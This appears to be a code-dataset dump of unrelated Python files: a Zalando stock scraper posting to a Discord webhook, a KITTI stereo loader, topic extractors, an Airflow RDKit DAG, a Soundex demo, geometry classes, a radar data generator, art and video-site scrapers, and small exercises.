\"Root=1-5ee7bae0-82260c065baf5ad7f0b3a3e3\"\n}\n\n\ndef scrape_site(url, headers,contentstring):\n test = requests.get(url, headers=headers).text\n soup = BeautifulSoup(test, 'html.parser')\n json_data = soup.find_all('script', id='z-vegas-pdp-props')\n print(test)\n for content in json_data: \n contentstring = content.string \n \n finalcontentstring = contentstring.strip()[9:-3].replace('449,00\\xa0zł','hello')\n \n json_without_slash = json.loads(finalcontentstring)\n desired_data = json_without_slash['model']['articleInfo']\n \n \n globalid = desired_data['id']\n releasedate = desired_data['release_date']\n \n if releasedate is None:\n releasedate = \"Already dropped\"\n else:\n essaie = datetime.strptime(releasedate, \"%y-%m-%d %I:%M:%S\")\n convertedReleaseDate = essaie + timedelta(hours=2)\n convertedReleaseDate = convertedReleaseDate.strftime(\"%d-%m-%y %I:%M:%S\")\n releasedate = convertedReleaseDate\n \n desired_data_units = desired_data['units']\n \n basics = []\n imagebasics = []\n fieldsSizes = []\n available_sizes = []\n available_pids = []\n available_stocks = []\n items = []\n\n for essential in [desired_data]:\n essentialsInfos = {\n 'id': essential[\"id\"], \n 'name': essential[\"name\"],\n 'shopUrl': essential['shopUrl'],\n }\n basics.append(essentialsInfos)\n \n \n mainimage = soup.find('img',{'class':'_6uf91T z-oVg8 u-6V88 ka2E9k uMhVZi FxZV-M _2Pvyxl JT3_zV EKabf7 mo6ZnF _1RurXL mo6ZnF PZ5eVw'})\n exelink = mainimage.attrs['src']\n\n for zalmainimage in [mainimage]:\n exelinkInfos = {\n 'src': zalmainimage[\"src\"], \n }\n imagebasics.append(exelinkInfos)\n \n for units in desired_data['units']:\n productitem = {\n 'pids': units[\"id\"], \n 'sizes': units['size']['local'], \n 'stocks': units['stock'],\n }\n items.append(productitem)\n \n \n newdict={}\n for k,v in [(key,d[key]) for d in items for key in d]:\n if k not in newdict: newdict[k]=[v]\n else: newdict[k].append(v)\n \n for pids in newdict['pids']:\n available_pids.append(pids),\n \n allPids = '\\n'.join(available_pids) \n \n for size in newdict['sizes']:\n available_sizes.append(size),\n \n allSizes = '\\n'.join(available_sizes) \n \n for stocks in newdict['stocks']:\n available_stocks.append(stocks),\n \n '''\n available_stocks_toString int to string stock for the embed\n ''' \n available_stocks_toString = [str(int) for int in available_stocks]\n str_of_ints = \"\\n\".join(available_stocks_toString)\n \n total_stock = sum(available_stocks)\n total_stock_to_string = str(total_stock)\n\n fieldsSizes.append({\"name\":\"GLOBAL ID\", \"value\":globalid, \"inline\": True})\n fieldsSizes.append({\"name\":\"TOTAL STOCK\", \"value\":total_stock_to_string, \"inline\": True})\n fieldsSizes.append({\"name\":\"RELEASE DATE\", \"value\":releasedate, \"inline\": True})\n fieldsSizes.append({\"name\":\"SIZES\", \"value\":allSizes, \"inline\": True})\n fieldsSizes.append({\"name\":\"SIZE PIDS\", \"value\":allPids, \"inline\": True})\n fieldsSizes.append({\"name\":\"STOCK\", \"value\":str_of_ints, \"inline\": True})\n \n data = {\n \"username\": CONFIG['USERNAMEZAL'],\n \"avatar_url\": CONFIG['AVATAR_URL'],\n \"embeds\": [{\n \"author\": {\n \"name\": \"Izi Cookz\", \n \"icon_url\": CONFIG['AVATAR_URL'],\n },\n \"title\": essential[\"name\"],\n \"thumbnail\": {\"url\": exelink},\n \"fields\": fieldsSizes,\n \"color\": int(CONFIG['COLOUR']),\n \"footer\": {\"text\": \"Made by JLM for Izi Cookz\",\"icon_url\": \"https://media1.tenor.com/images/bcebfc84143c63f127c7fd80826f01bf/tenor.gif?itemid=22297787\"},\n \"timestamp\": str(datetime.utcnow()),\n \"url\": essential['shopUrl'],\n }]\n }\n result = rq.post(CONFIG['WEBHOOKZAL'], data=json.dumps(data), headers={\"Content-Type\": \"application/json\"})\n \n \n\n \ndef discordbot():\n bot = commands.Bot(command_prefix=\"!\")\n TOKEN = CONFIG['DISCORD_TOKEN']\n\n @bot.event\n async def on_ready():\n print(f'Bot connected as {bot.user}')\n \n @bot.command(\"zalando\")\n async def dosomething(ctx,url):\n scrape_site(url, headers, contentstring)\n \n\n\n bot.run(TOKEN)\n\nif __name__ == '__main__':\n discordbot()\n\n \n\n \n","sub_path":"zalando.py","file_name":"zalando.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"640696125","text":"# -*- coding: utf-8 -*-\n# @Author: yulidong\n# @Date: 2018-03-19 13:33:07\n# @Last Modified by: yulidong\n# @Last Modified time: 2018-11-16 02:15:30\n\nimport os\nimport torch\nimport numpy as np\nfrom torch.utils import data\nimport torchvision.transforms as transforms\nimport random\nclass KITTI(data.Dataset):\n\n\n def __init__(self, root, split=\"train\", is_transform=True, img_size=(540,960)):\n \"\"\"__init__\n\n :param root:\n :param split:\n :param is_transform:\n :param img_size:\n \"\"\"\n self.is_transform = is_transform\n self.img_size = img_size if isinstance(img_size, tuple) else (540, 960)\n self.stats={'mean': [0.485, 0.456, 0.406],\n 'std': [0.229, 0.224, 0.225]}\n self.files = {}\n self.datapath=root\n self.files=os.listdir(os.path.join(self.datapath,'train_all'))\n self.files.sort() \n self.split=split\n if len(self.files)<1:\n raise Exception(\"No files for ld=[%s] found in %s\" % (split, self.ld))\n self.length=self.__len__()\n print(\"Found %d in %s data\" % (len(self.files), self.datapath))\n\n def __len__(self):\n \"\"\"__len__\"\"\"\n return len(self.files)\n\n def __getitem__(self, index):\n \"\"\"__getitem__\n\n :param index:\n \"\"\"\n #index=58\n\n data=np.load(os.path.join(self.datapath,'train_all',self.files[index]))\n #print(os.path.join(self.datapath,self.split,self.files[index]))\n if self.split=='train' or self.split=='train_all':\n position=np.nonzero(data[...,6])\n hmin=np.min(position[0])\n hmax=np.max(position[0])\n wmin=np.min(position[1])\n wmax=np.max(position[1])\n if hmax-hmin<=256:\n hmin=hmax-256\n if wmax-wmin<=512:\n wmax=wmin+512\n th, tw = 256, 512\n x1 = random.randint(hmin, hmax - th)\n y1 = random.randint(wmin, wmax - tw)\n data=data[x1:x1+th,y1:y1+tw,:]\n else:\n h,w = data.shape[0],data.shape[1]\n th, tw = 384, 1248\n x1 = 0\n y1 = 0\n padding_h=data[:(th-h),:,:]\n padding_h[:,:,6]=0\n data=np.concatenate([padding_h,data],0)\n padding_w=data[:,:(tw-w),:]\n padding_w[:,:,6]=0\n data=np.concatenate([padding_w,data],1)\n #data[:(th-h),:(tw-w),6]=0\n #data=data[:540,:960,:]\n left=data[...,0:3]/255\n #\n image=data[...,0:3]\n image=transforms.ToTensor()(image)\n #print(torch.max(image),torch.min(image))\n right=data[...,3:6]/255\n disparity=data[...,6]\n # print(np.sum(np.where(disparity[:540,...]==0,np.ones(1),np.zeros(1))))\n # print(np.sum(np.where(disparity[:540,...]<=1,np.ones(1),np.zeros(1))))\n # print(np.sum(np.where(disparity<=2,np.ones(1),np.zeros(1))))\n # print(np.sum(np.where(disparity<=3,np.ones(1),np.zeros(1))))\n # print(disparity.shape)\n if self.is_transform:\n left, right,disparity = self.transform(left, right,disparity)\n if self.split=='test':\n return left, right,disparity,image,self.files[index].split('.')[0],h,w\n #print(torch.max(left),torch.min(left))\n return left, right,disparity,image\n def transform(self, left, right,disparity):\n \"\"\"transform\n \"\"\"\n trans=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(**self.stats),\n ])\n \n left=trans(left).float()\n right=trans(right).float()\n\n disparity=torch.from_numpy(disparity).float()\n\n return left,right,disparity\n","sub_path":"back of code/CMF/cmf/loader/KITTI # train_all.py","file_name":"KITTI # train_all.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"589112372","text":"import numpy as np\nfrom sklearn.cluster import KMeans\nfrom sklearn.neighbors import NearestNeighbors\nfrom collections import Counter\nimport platform\n\nclass TopicExtractor(object):\n def __init__(self, keywords):\n self.keywords = keywords\n\nclass TopicExtractorCount(TopicExtractor):\n def __init__(self, keywords,k=1):\n super(self.__class__, self).__init__(keywords)\n self.k = k\n def extractTopics(self):\n print(self.keywords)\n cnt = Counter(self.keywords)\n if(platform.system() == 'Windows'):\n \tprint([word for word, occur in iter(cnt.items()) if occur > self.k])\n else:\n print([word for word, occur in cnt.iteritems() if occur > self.k])\n\n\nclass TopicExtractorKMeans(TopicExtractor):\n def __init__(self, keywords,k=5):\n super(self.__class__, self).__init__(keywords)\n self.k = min(k, len(keywords))\n self.kmeans = KMeans(n_clusters=self.k)\n self.keywords = keywords\n self.nbrs = NearestNeighbors(n_neighbors=1).fit(self.keywords)\n\n def extractTopics(self, values_array, keys_array):\n self.kmeans.fit(self.keywords)\n centroids = np.array(self.kmeans.cluster_centers_)\n self.results = list(self.nbrs.kneighbors(X=centroids, n_neighbors=1, return_distance=False))\n\n for k in range(len(self.results)):\n emb = self.keywords[self.results[k]]\n idx = np.where(values_array == emb)[0][0]\n print('topic ', k+1, ': ', keys_array[idx])\n","sub_path":"LIP/TopicExtractor/TopicExtractor.py","file_name":"TopicExtractor.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"183477298","text":"import os\nimport airflow\nfrom airflow.models import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.subdag_operator import SubDagOperator\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom rdkit import Chem\nfrom rdkit import RDPaths\nfrom rdkit.Chem import AllChem\n\n# load multiple molecules from SDF.\nmols = [m for m in Chem.SDMolSupplier(os.path.join(RDPaths.RDDocsDir,'Book/data/cdk2.sdf'))]\n\ndef save_3d_mol(idx, molobj):\n molobj = Chem.AddHs(molobj)\n AllChem.EmbedMolecule(molobj)\n Chem.MolToMolFile(molobj, f'./out/{idx}_mol.mol')\n\n\ndef subdag(parent_dag_name, child_dag_name, args):\n sub_dag = DAG(dag_id=f'{parent_dag_name}.{child_dag_name}', default_args=args, schedule_interval='@once')\n if not os.path.isdir('./out'):\n os.mkdir('./out')\n for idx, mol in enumerate(mols):\n t1 = PythonOperator(\n task_id=f'{idx}-sub-task-1',\n provide_context=False,\n python_callable=save_3d_mol,\n default_args=args,\n op_kwargs={'idx':idx, 'molobj':mol},\n dag=sub_dag,\n )\n t1\n return sub_dag\n\nDAG_NAME = 'subdag_operator'\n\nargs = {\n 'owner': 'airflow',\n 'start_date': airflow.utils.dates.days_ago(2),\n 'provide_context': True,\n }\n\ndag = DAG(dag_id=DAG_NAME,\n default_args=args,\n schedule_interval='@once')\n\nt1 = DummyOperator(task_id='start',\n default_args=args,\n dag=dag,\n )\n\nt2 = SubDagOperator(task_id='subdag',\n subdag=subdag(DAG_NAME, 'subdag', args),\n default_args=args,\n dag=dag,\n )\n\nt3 = DummyOperator(task_id='end',\n default_args=args,\n dag=dag,)\nt1 >> t2 >> t3\n","sub_path":"dags/mishimasyk2.py","file_name":"mishimasyk2.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"352424001","text":"#import string and re\r\nimport string,re\r\n\r\ncharToSoundex = {\"A\":\"9\",\r\n \"B\":\"1\",\r\n \"C\":\"2\",\r\n \"D\":\"3\",\r\n \"E\":\"9\",\r\n \"F\":\"1\",\r\n \"G\":\"2\",\r\n \"H\":\"9\",\r\n \"I\":\"9\",\r\n \"J\":\"2\",\r\n \"K\":\"2\",\r\n \"L\":\"4\",\r\n \"M\":\"5\",\r\n \"N\":\"5\",\r\n \"O\":\"9\",\r\n \"P\":\"1\",\r\n \"Q\":\"2\",\r\n \"R\":\"6\",\r\n \"S\":\"2\",\r\n \"T\":\"3\",\r\n \"U\":\"9\",\r\n \"V\":\"1\",\r\n \"W\":\"9\",\r\n \"X\":\"2\",\r\n \"Y\":\"9\",\r\n \"Z\":\"2\",}\r\n\r\n\"Wouldn't it be faster to write a loop checking each character\"\r\nisOnlyChars = re.compile('[A-Za-z]+$').search\r\n\r\ndef soundex(source):\r\n \"convert string to Sountex equivalent\"\r\n \r\n #source string must be at least 1 character and must consist enterely of letters\r\n if not isOnlyChars(source):\r\n return \"0000\"\r\n\r\n # make first character uppercase\r\n source = source[0].upper() + source[1:]\r\n\r\n #translate all other characters to Soundex digits\r\n digits = source[0]\r\n for s in source[1:]:\r\n s = s.upper()\r\n digits += charToSoundex[s]\r\n\r\n #remove consecutive duplicates\r\n digits2 = digits[0]\r\n for d in digits[1:]:\r\n if digits2[-1] !=d:\r\n digits2 += d\r\n\r\n #remove all \"9\"s\r\n digits3 = re.sub('9','',digits2)\r\n\r\n # pad end with \"0\"s to 4 characters\r\n while len(digits3) < 4:\r\n digits3 += \"0\"\r\n\r\n #return first 4 characters\r\n return digits3[:4]\r\n\r\nif __name__ == '__main__':\r\n #import the class Timer from the module timeit\r\n from timeit import Timer\r\n names = ('A','Python','Programming')\r\n for name in names:\r\n statement = \"soundex('%s')\" % name\r\n t = Timer(statement,\"from __main__ import soundex\")\r\n print(name.ljust(15),soundex(name),min(t.repeat()))\r\n","sub_path":"23_performance_tuning/2_Optimizing_Dictionary_lookups_demo.py","file_name":"2_Optimizing_Dictionary_lookups_demo.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"192259807","text":"import os, glob\nimport torch\nimport cv2\nimport numpy as np\nfrom global_config import global_config\nimport itertools\nfrom utils.units import mm_dbz, get_crop_boundary_idx\nfrom multiprocessing import Pool\nnp.random.seed(42)\n\nclass DataGenerator():\n\n def __init__(self, data_path, config):\n\n self.config = config\n self.batch_size = config['BATCH_SIZE']\n self.in_len = config['IN_LEN']\n self.out_len = config['OUT_LEN']\n self.windows_size = config['IN_LEN'] + config['OUT_LEN']\n self.windows_size_test = config['IN_LEN'] + global_config['OUT_TARGET_LEN']\n self.files = sorted([file for file in glob.glob(data_path)])\n self.n_files = len(self.files) - self.windows_size + 1\n self.n_val = int(self.n_files / 5)\n self.n_test = int(self.n_files / 5)\n self.n_train = self.n_files - self.n_val - self.n_test\n self.last_data = None\n self.train_indices = np.arange(self.n_train)\n self.train_indices = np.setdiff1d(self.train_indices, global_config['MISSINGS'])\n self.val_indices = np.arange(self.n_val) + self.n_train\n self.val_indices = np.setdiff1d(self.val_indices, global_config['MISSINGS'])\n self.test_indices = np.arange(self.n_test) + self.n_train #+ self.n_val\n self.test_indices = np.setdiff1d(self.test_indices, global_config['MISSINGS'])\n self.shuffle()\n\n def read_resize(self, p):\n (i, h, w) = p\n f = np.fromfile(self.files[i], dtype=np.float32) \\\n .reshape((global_config['DATA_HEIGHT'], global_config['DATA_WIDTH']))\n return cv2.resize(f, (w, h), interpolation = cv2.INTER_AREA)\n\n def get_data(self, indices):\n if self.config['SCALE'] is None:\n h = self.config['SIZEH']\n w = self.config['SIZEW']\n else:\n scale = self.config['SCALE']\n h = int(global_config['DATA_HEIGHT'] * scale)\n w = int(global_config['DATA_WIDTH'] * scale)\n sliced_data = np.zeros((len(indices), self.windows_size, h, w), dtype=np.float32)\n for i, idx in enumerate(indices):\n for j in range(self.windows_size):\n f = np.fromfile(self.files[idx + j], dtype=np.float32) \\\n .reshape((global_config['DATA_HEIGHT'], global_config['DATA_WIDTH']))\n sliced_data[i, j] = \\\n cv2.resize(f, (w, h), interpolation = cv2.INTER_AREA)\n # for i, idx in enumerate(indices):\n # with Pool(4) as p:\n # thread_data = p.map(self.read_resize, [(idx + j, h, w) for j in range(self.windows_size)])\n # sliced_data[i] = np.array(thread_data)\n \n return (mm_dbz(sliced_data) - global_config['NORM_MIN']) / global_config['NORM_DIV']\n\n def get_data_indices(self, idx):\n\n if self.last_data is not None:\n for i in self.last_data:\n del i\n torch.cuda.empty_cache()\n\n self.last_data = []\n data = self.get_data(idx)\n if self.config['DIM'] == 'RR':\n self.last_data.append(torch.from_numpy(data[:, :-1]).to(self.config['DEVICE']))\n self.last_data.append(torch.from_numpy(data[:, 1:]).to(self.config['DEVICE']))\n else:\n self.last_data.append(torch.from_numpy(data[:, :self.in_len]).to(self.config['DEVICE']))\n self.last_data.append(torch.from_numpy(data[:, self.in_len:]).to(self.config['DEVICE']))\n if self.config['DIM'] == '3D':\n for i in range(len(self.last_data)):\n self.last_data[i] = self.last_data[i][:, None, :]\n elif self.config['DIM'] == '2D':\n for i in range(len(self.last_data)):\n self.last_data[i] = self.last_data[i][:, :, None]\n\n return tuple(self.last_data)\n\n def get_train(self, i):\n idx = self.train_indices[i * self.batch_size : min((i+1) * self.batch_size, self.train_indices.shape[0])]\n return self.get_data_indices(idx)\n\n def get_val(self, i):\n idx = self.val_indices[i * self.batch_size : min((i+1) * self.batch_size, self.val_indices.shape[0])]\n return self.get_data_indices(idx)\n\n def get_data_test(self, indices):\n\n if self.config['SCALE'] is None:\n h = self.config['SIZEH']\n w = self.config['SIZEW']\n else:\n scale = self.config['SCALE']\n h = int(global_config['DATA_HEIGHT'] * scale)\n w = int(global_config['DATA_WIDTH'] * scale)\n sliced_input = np.zeros((len(indices), self.config['IN_LEN'], h, w), dtype=np.float32)\n sliced_label = np.zeros((len(indices), global_config['OUT_TARGET_LEN'], global_config['DATA_HEIGHT'], global_config['DATA_WIDTH']), dtype=np.float32)\n for i, idx in enumerate(indices):\n for j in range(self.config['IN_LEN']):\n f = np.fromfile(self.files[idx + j], dtype=np.float32) \\\n .reshape((global_config['DATA_HEIGHT'], global_config['DATA_WIDTH']))\n sliced_input[i, j] = \\\n cv2.resize(f, (w, h), interpolation = cv2.INTER_AREA)\n \n for i, idx in enumerate(indices):\n for j in range(global_config['OUT_TARGET_LEN']):\n sliced_label[i, j] = np.fromfile(self.files[idx + j], dtype=np.float32) \\\n .reshape((global_config['DATA_HEIGHT'], global_config['DATA_WIDTH']))\n \n sliced_input = (mm_dbz(sliced_input) - global_config['NORM_MIN']) / global_config['NORM_DIV']\n\n if self.last_data is not None:\n for i in self.last_data:\n del i\n torch.cuda.empty_cache()\n\n self.last_data = []\n self.last_data.append(torch.from_numpy(sliced_input).to(self.config['DEVICE']))\n \n self.last_data.append(sliced_label)\n\n if self.config['DIM'] == '3D':\n for i in range(len(self.last_data)):\n self.last_data[i] = self.last_data[i][:, None, :]\n elif self.config['DIM'] == '2D':\n for i in range(len(self.last_data)):\n self.last_data[i] = self.last_data[i][:, :, None]\n \n return tuple(self.last_data)\n\n def get_test(self, i):\n idx = self.test_indices[i * self.batch_size : min((i+1) * self.batch_size, self.test_indices.shape[0])]\n return self.get_data_test(idx)\n\n def shuffle(self):\n np.random.shuffle(self.train_indices)\n\n def n_train_batch(self):\n return int(np.ceil(self.train_indices.shape[0]/self.batch_size))\n\n def n_val_batch(self):\n return int(np.ceil(self.val_indices.shape[0]/self.batch_size))\n\n def n_test_batch(self):\n return int(np.ceil(self.test_indices.shape[0]/self.batch_size))","sub_path":"utils/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":6777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"447640228","text":"import pandas as pd\nimport os\nimport numpy as np\nimport re, json, os, requests, scipy.misc\nimport matplotlib.pyplot as plt\nimport lxml.html as lh\nfrom bs4 import BeautifulSoup, NavigableString, Tag\nfrom skimage import io, data\nfrom skimage.color import rgb2gray\nfrom skimage.color import rgb2hsv\nfrom scipy import ndimage\nfrom sklearn.decomposition import PCA\n\n\nfull_list_images = []\ndef data(urls, outpath): \n total_list = {}\n \n for u in urls: \n page = requests.get(u)\n soup = BeautifulSoup(page.content,'html.parser')\n tb = soup.find_all('table', class_='main')\n title = soup.find('title').get_text('title')[16:] \n\n list_names = []\n images = []\n type_art = []\n for link in tb:\n name = link.find('b')\n text = link.find('br')\n \n list_names.append(name.get_text('title'))\n images.append(link.find('img').get('src'))\n \n meta_data = []\n #br tags\n for br in soup.findAll('br'):\n next_s = br.nextSibling\n if not (next_s and isinstance(next_s,NavigableString)):\n continue\n next2_s = next_s.nextSibling\n if next2_s and isinstance(next2_s,Tag) and next2_s.name == 'br':\n text = str(next_s).strip()\n if text:\n meta_data.append(text)\n \n full_list_images.append(images)\n total_list[title] = list_names,images,meta_data\n if not os.path.exists(outpath):\n os.mkdir(outpath)\n return total_list\n\n\ndef process(data): \n links = []\n titles = []\n misc_data = []\n for i in data.values(): \n links.append(i[1])\n titles.append(i[0])\n misc_data.append(i[2])\n \n df = pd.DataFrame({'name of painting':titles,\n 'img link':links,\n 'info':misc_data}, \n \n index=[list(data.keys())])\n l = []\n for i in df['info']: \n s_l = []\n for j in range(0,len(i),3): \n s_l.append(i[j+1:j+3])\n l.append(s_l)\n df['l'] = l\n \n #Index by each painting, and not each era \n list_one = []\n for i in range(len(df['name of painting'])): #go through each era \n list_two = []\n for j in range(len(df['name of painting'][i])): #go through each list \n\n painting = df['name of painting'][i][j]\n era = list(df.index[i])[0]\n link = df['img link'][i][j] \n moreinfo = []\n for k in df['l'][i][j]:\n moreinfo.append(k)\n\n list_two.append([era,painting,link,moreinfo[0]])\n\n list_one.append(list_two)\n tolist = [j for i in list_one for j in i ]\n big_df = pd.DataFrame(tolist)\n big_df = big_df.rename(columns={0:'era', 1:'painting', 2:'url', 3:'metadata'})\n\n #painting or drawing\n paintdraw = []\n for i in big_df['metadata']:\n if 'paint' in i or 'canvas' in i:\n paintdraw.append('Painting')\n elif 'paper' in i:\n paintdraw.append('Drawing')\n else: \n paintdraw.append('N/A')\n big_df['painting or drawing'] = paintdraw\n big_df['metadata'] = big_df['metadata'].str.replace('\\n','').str.replace(' ','')\n big_df['metadata'] = big_df['metadata'].str.split(',')\n\n #separate type and dimensions\n big_df[\"type\"] = big_df[\"metadata\"].str[0]\n big_df['dimensions'] = big_df['metadata'].str[1]\n big_df = big_df.drop(columns=['metadata'])\n\n return big_df\n\n\n#driver function\ndef get_data(urls,outdir, **kwargs): \n\n\tif not os.path.exists(outdir):\n\t\tos.mkdir(outdir)\n\tx = data(urls, **kwargs)\n\tcfg = json.load(open('config_a1.json')) \n\tdf = process(x)\n\tdf.to_csv(os.path.join(outdir,'df.csv'))\n\n\treturn","sub_path":"src/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"645619766","text":"# 숫자 -> stack에 넣기\n# 연산기호 icp, isp 정하기\nT = int(input())\n\nisp = {'(':0, '+':1, '-':1, '*':2, '/':2, ')':0}\nicp = {'(':3, '+':1, '-':1, '*':2, '/':2, ')':0}\n\nfor t in range(1, T+1):\n str_list = list(map(str, input().split()))\n stack = []\n operator = []\n\n for s in str_list:\n if s.isdigit():\n stack.append(int(s))\n print(stack)\n else:\n if s == '(':\n operator.append(s)\n print(operator)\n else:\n if icp[s] > isp[operator[-1]]:\n operator.append(s)\n else:\n while icp[s] <= isp[operator[-1]]:\n token = operator.pop()\n stack.append(token)\n \n print(stack)","sub_path":"intermediate/day_05/Forth복습.py","file_name":"Forth복습.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"222345192","text":"import warnings\nimport numpy as _np\nfrom scipy.constants import golden\nfrom itertools import combinations_with_replacement\n\nclass Atom(object):\n def __init__(self, atom_type, xyz):\n # Todo: use either string or numeric atom type \n # and do the convertion here\n self.atom_type = atom_type\n self.xyz = xyz\n\nclass Cluster(object):\n def __init__(self):\n self.atoms = []\n self.neighbors = []\n\n def calc_neighbors(self, R = 3.0):\n self.neighbors = []\n for a in self.atoms:\n n = []\n for j, b in enumerate(self.atoms):\n if not a is b and _np.linalg.norm(a.xyz-b.xyz) < R:\n n.append(j)\n self.neighbors.append(n)\n\n def read(self, filename):\n if filename[-4:] == \".xyz\":\n self.read_xyz(filename)\n else:\n warnings.warn(\"Unknown file extension!\") \n\n def read_xyz(self, filename):\n with open(filename, \"r\") as f_in:\n for i, line in enumerate(f_in):\n if i == 0:\n # set counter for number of lines to be read\n counter = int(line)\n # Skip comment line\n next(f_in)\n elif counter >= 0:\n sp = line.split()\n self.atoms.append(Atom(sp[0], _np.array([float(s) for s in sp[1:4]])))\n counter -= 1\n if counter == 0:\n break\n\n \nclass Ikosaeder(object):\n basis_vectors = _np.sqrt(1 + golden**2)**(-1) * _np.array([[0, 1, golden], # 0\n [0, 1, -golden], # 1\n [0, -1, golden], # 2\n [0, -1, -golden], # 3\n [1, golden, 0], # 4\n [1, -golden, 0], # 5\n [-1, golden, 0], # 6\n [-1, -golden, 0], # 7\n [golden, 0, 1], # 8\n [golden, 0, -1], # 9\n [-golden, 0, 1], # 10\n [-golden, 0, -1]])# 11\n\n faces = [[0, 4, 8],\n [0, 4, 6],\n [0, 6, 10],\n [0, 10, 2],\n [0, 2, 8],\n [2, 7, 5],\n [2, 5, 8],\n [8, 5, 9],\n [8, 9, 4],\n [4, 9, 1],\n [4, 1, 6],\n [6, 1, 11],\n [6, 11, 10],\n [10, 11, 7],\n [10, 7, 2],\n [3, 1, 9],\n [3, 9, 5],\n [3, 5, 7],\n [3, 7, 11],\n [3, 11, 1]]\n \n unit_vectors = _np.eye(12)\n \n def __init__(self):\n pass\n\n def build_layers(self, n):\n # Add center atom\n vectors = [[[0,0,0,0,0,0,0,0,0,0,0,0]]]\n # Build individual layer\n for i in range(1,n+1):\n layer = []\n # Build layer triangle by triangle\n for fa in self.faces:\n face_vecs = [self.unit_vectors[fa[0]], self.unit_vectors[fa[1]], self.unit_vectors[fa[2]]]\n for perm in combinations_with_replacement(face_vecs, i):\n vec = list(_np.sum(perm,0))\n # Check if vec is already in layer (happens along the edges)\n if not vec in layer:\n layer.append(vec) \n vectors.append(layer)\n self.layers = vectors\n\n @staticmethod\n def get_xyz(layers, scale):\n xyzs = []\n if len(_np.shape(layers)) == 1: # multiple layers\n for layer in layers:\n for atom in layer:\n xyzs.append(scale*_np.array(atom).dot(Ikosaeder.basis_vectors))\n else: # single layer\n for atom in layers:\n xyzs.append(scale*_np.array(atom).dot(Ikosaeder.basis_vectors))\n return xyzs\n \n @staticmethod\n def get_magic_nr(n):\n n = n+1 # To stay consistent with the definition of number of layers\n return (10*n**3 - 15*n**2 + 11*n - 3)/3\n \n @staticmethod \n def draw_sphere(ax, center, c = \"b\"):\n u = _np.linspace(0, 2 * _np.pi, 72+1)\n v = _np.linspace(0, _np.pi, 36+1)\n \n x = center[0] + 1 * _np.outer(_np.cos(u), _np.sin(v))\n y = center[1] + 1 * _np.outer(_np.sin(u), _np.sin(v))\n z = center[2] + 1 * _np.outer(_np.ones(_np.size(u)), _np.cos(v))\n ax.plot_surface(x, y, z, rstride=4, cstride=4, linewidth = 0, color = c, alpha = 0.5)\n\nclass TwoDGrid(object):\n\n def __init__(self, a, b):\n self.a = a\n self.b = b\n\n def get_xyz(self, scale):\n xyzs = []\n for i in xrange(self.a):\n for j in xrange(self.b):\n xyzs.append(scale*(i*_np.array([1.,0.,0.]) + j*_np.array([0.,1.,0.])))\n return xyzs\n \n\n","sub_path":"input_classes.py","file_name":"input_classes.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"298432355","text":"\n# https://leetcode.com/problems/find-positive-integer-solution-for-a-given-equation/submissions/\n\n\"\"\"\n This is the custom function interface.\n You should not implement it, or speculate about its implementation\n class CustomFunction:\n # Returns f(x, y) for any given positive integers x and y.\n # Note that f(x, y) is increasing with respect to both x and y.\n # i.e. f(x, y) < f(x + 1, y), f(x, y) < f(x, y + 1)\n def f(self, x, y):\n\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def findSolution(self, customfunction: 'CustomFunction', z: int) -> List[List[int]]:\n ans = []\n for x in range(1, z + 1):\n y = self.bs(x, z, customfunction)\n if y != -1:\n ans.append([x, y])\n return ans\n\n def bs(self, x, z, customfunction):\n bad = 0\n good = z + 1\n while good - bad > 1:\n m = (good + bad) // 2\n if customfunction.f(x, m) >= z:\n good = m\n else:\n bad = m\n\n if customfunction.f(x, good) == z:\n return good\n return -1","sub_path":"bsearch/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"410244448","text":"from . import ScribeModuleBaseClass\nfrom . lib.util import format_url\n\nimport re as _re\nimport sys\nimport json\nimport re\n\nclass Ocp_install_configm(ScribeModuleBaseClass):\n\n def __init__(self, input_dict=None, module_name=None, host_name=None,\n input_type=None, scribe_uuid=None):\n ScribeModuleBaseClass.__init__(self, module_name=module_name,\n input_dict=input_dict,\n host_name=host_name,\n input_type=input_type,\n scribe_uuid=scribe_uuid)\n if input_dict:\n self.value = self._parse(input_dict)\n\n def __iter__(self):\n for attr, value in self.__dict__.items():\n yield attr, value\n\n def _parse(self, items_full):\n item = dict(items_full)\n return item\n","sub_path":"transcribe/scribe_modules/ocp_install_config.py","file_name":"ocp_install_config.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"605495057","text":"#!/usr/bin/python2.7\n# -*- coding: utf-8 -*- \nimport re\nimport scrapy\n\nclass StreamSpider(scrapy.Spider):\n name = \"stream\"\n start_urls = [\"http://streamjav.net/\"]\n\n def parse(self, response):\n # 解析图片地址\n for item in response.css(\"div.tn-bxitem\"):\n video_src = item.css('a::attr(href)').extract_first()\n if video_src is not None:\n yield response.follow(video_src, callback=self.parse_video)\n\n # 解析视频地址\n def parse_video(self, response):\n iframe_str = response.css('div#embed>input::attr(value)').extract_first()\n pattern = 